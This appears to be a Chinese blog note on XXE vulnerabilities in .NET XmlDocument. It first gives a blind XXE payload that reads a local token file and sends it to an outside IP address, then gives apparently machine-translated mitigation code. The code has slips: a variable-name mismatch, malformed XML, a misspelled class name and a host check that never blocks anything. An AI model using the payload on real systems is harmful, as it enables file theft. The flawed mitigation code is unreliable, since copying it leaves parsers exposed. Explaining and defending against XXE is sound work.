XmlDocument 避免XXE

string xml2 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\" ?><!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://182.84.222.228:89/eval.xml\">%remote;]></root>";

XmlDocument xmlDoc = new XmlDocument();
//xmlDoc.XmlResolver = null;
xmlDoc.LoadXml(xml);

Console.WriteLine(xmlDoc.InnerText);

上面代码发起请求，服务器上用下面这个代码

<!ENTITY % payload "1111"><!ENTITY % int "<!ENTITY % trick SYSTEM 'http://182.84.222.228:89/Get.aspx?p=%payload;'>">%int;%trick;

会发现服务器接收到了请求。参数名是 p ，内容是 1111

如果把前面一个实体类改为读取系统文件的，危害就比较大了，比如（我只是随便读取一个盘符的文件）：

<!ENTITY % payload SYSTEM "file://c:/token.txt"><!ENTITY % int "<!ENTITY % trick SYSTEM 'http://182.84.222.228:89/Get.aspx?p=%payload;'>">%int;%trick;

==========================

使用 XmlDocument.XmlResolver 属性提供的XmlResolver 解决外部资源。 如果你的XML文档不包含任何外部资源( 例如dtd或者模式)，只需将这里属性设置为 null:

XmlDocument xmlDoc = new XmlDocument();
xmlDoc.XmlResolver = null;
xmlDoc.LoadXml(OurOutputXMLString);

如果希望过滤来自( 。例如仅允许某些域)的url，只需从 XmlUrlResolver 派生自己的类并重写 ResolveUri() 方法。 你可以在那里检查URL是什么，并消毒它。

例如：

class CustomUrlResovler : XmlUrlResolver
{
 public override Uri ResolveUri(Uri baseUri, string relativeUri)
 {
 Uri uri = new Uri(baseUri, relativeUri);
 if (IsUnsafeHost(uri.Host))
 return null;
 return base.ResolveUri(baseUri, relativeUri);
 }
 private bool IsUnsafeHost(string host)
 {
 return false;
 }
}

其中 IsUnsafeHost() 是一个自定义函数，它检查给定的主机是否允许或者不被允许。 看到这篇文章对于一些想法。 只是从 ResolveUri()保存返回 null 代码从这种攻击。 如果允许 URI，你可以简单地返回默认的XmlUrlResolver.ResolveUri() 实现。

要使用它：

XmlDocument xmlDoc = new XmlDocument();
xmlDoc.XmlResolver = new CustomUrlResolver();
xmlDoc.LoadXml(OurOutputXMLString);

关于如何解析XML外部资源的更多细节，请阅读本文 。